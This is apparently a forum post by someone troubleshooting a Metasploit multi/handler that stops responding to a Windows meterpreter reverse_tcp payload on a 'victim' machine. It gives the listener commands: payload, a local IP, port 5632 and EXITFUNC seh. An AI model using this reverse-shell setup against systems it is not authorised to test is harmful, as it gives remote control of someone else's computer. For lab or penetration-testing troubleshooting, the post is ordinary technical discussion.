Yep, very sure the commands are correct, I did another test today, using ./msfconsole
Using (arrow up) to reissue the commands to ensure I was not making a simple typo.
I tried with different EXITFUNCs as well which I hadnt last time.
Basically all was hunky dory, had retried it at least 6 times, and all was good.
With retrying I mean;
Stopping meterpreter, the multi/handler and exiting msfconsole
Ensuring the payload is no longer running on victim
Then I left it for a while (+- 30/45min)
then tried again and the same problem as before;
Metasploit not responding to the syn packet being sent by victim.
The listner started the same way as before in msfconsole;
reverse_tcp.exe of course only executed AFTER the multi/handler listening.
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.105
set lport 5632
set exitfunc seh
Very strange, Internet is working normally on the IP, connection seems good.
Might try to flush the iptables though and see if that helps.
If I figure out what it is I will revert, but no ideas so far..
Thanks for your answers and should you come up with any further ideas, please let me know !